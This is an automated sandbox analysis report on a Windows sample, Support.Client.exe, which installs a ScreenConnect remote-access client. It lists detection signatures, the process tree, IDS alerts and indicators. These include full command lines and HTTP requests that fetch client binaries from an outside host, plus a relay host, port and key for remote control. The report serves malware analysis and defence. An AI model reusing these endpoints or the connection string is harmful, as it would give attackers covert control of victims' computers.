Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Support.Client.exe

Overview

General Information

Sample name:Support.Client.exe
Analysis ID:1579450
MD5:35981eb47ca481b1cc8f4495da53685f
SHA1:8d5601de3cfc67aca5748f50ddf9f6e63de708ce
SHA256:32694b10b3f04d250b82cce2fc909dc70b074b060407b5ded5355e66f2793aa6
Tags:exeuser-windshock
Infos:

Detection

ScreenConnect Tool
Score:57
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • Support.Client.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\Support.Client.exe" MD5: 35981EB47CA481B1CC8F4495DA53685F)
    • dfsvc.exe (PID: 7604 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 1216 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)
        • ScreenConnect.ClientService.exe (PID: 2944 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • WerFault.exe (PID: 7764 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 884 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7664 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7700 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7568 -ip 7568 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7784 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 3020 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 7560 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe" "RunRole" "f96fdd58-b31b-40b0-b300-0e1ead05a7df" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      SourceRuleDescriptionAuthorStrings
      00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000001.00000002.2525404173.00000251406A3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          00000009.00000002.2135937329.0000000002E8F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Process Memory Space: dfsvc.exe PID: 7604JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Process Memory Space: ScreenConnect.WindowsClient.exe PID: 1216JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 1 entries
                SourceRuleDescriptionAuthorStrings
                9.0.ScreenConnect.WindowsClient.exe.a30000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49731, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 7604, Protocol: tcp, SourceIp: 104.168.134.232, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 7664, ProcessName: svchost.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-22T12:47:14.594623+010020098971A Network Trojan was detected104.168.134.232443192.168.2.449748TCP
                  2024-12-22T12:47:16.941092+010020098971A Network Trojan was detected104.168.134.232443192.168.2.449750TCP
                  2024-12-22T12:47:25.014789+010020098971A Network Trojan was detected104.168.134.232443192.168.2.449756TCP
                  2024-12-22T12:47:27.353673+010020098971A Network Trojan was detected104.168.134.232443192.168.2.449758TCP
                  2024-12-22T12:47:30.011230+010020098971A Network Trojan was detected104.168.134.232443192.168.2.449760TCP
                  2024-12-22T12:47:32.707382+010020098971A Network Trojan was detected104.168.134.232443192.168.2.449762TCP
                  2024-12-22T12:47:37.091079+010020098971A Network Trojan was detected104.168.134.232443192.168.2.449763TCP
                  2024-12-22T12:47:40.347990+010020098971A Network Trojan was detected104.168.134.232443192.168.2.449764TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Support.Client.exeVirustotal: Detection: 20%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.0% probability
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C01000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00C01000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to behavior

                  Compliance

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: Support.Client.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Support.Client.exeStatic PE information: certificate valid
                  Source: unknownHTTPS traffic detected: 104.168.134.232:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.168.134.232:443 -> 192.168.2.4:49748 version: TLS 1.2
                  Source: Support.Client.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2525404173.000002514097C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405FE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2135607585.0000000001272000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Support.Client.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AB0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140978000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405FA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2133716671.0000000002DA2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.2946951475.000000001B400000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.2939873486.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.2129224859.000000000021D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140974000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405F6000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2138587457.000000001BDE2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140974000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405F6000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2138587457.000000001BDE2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2525404173.000002514097C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405FE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2135607585.0000000001272000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140449000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2134375244.0000000005242000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior

                  Networking

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeRegistry value created: NULL Service
                  Source: global trafficTCP traffic: 192.168.2.4:49766 -> 104.168.134.232:8041
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.168.134.232:443 -> 192.168.2.4:49748
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.168.134.232:443 -> 192.168.2.4:49758
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.168.134.232:443 -> 192.168.2.4:49756
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.168.134.232:443 -> 192.168.2.4:49750
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.168.134.232:443 -> 192.168.2.4:49762
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.168.134.232:443 -> 192.168.2.4:49763
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.168.134.232:443 -> 192.168.2.4:49760
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.168.134.232:443 -> 192.168.2.4:49764
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
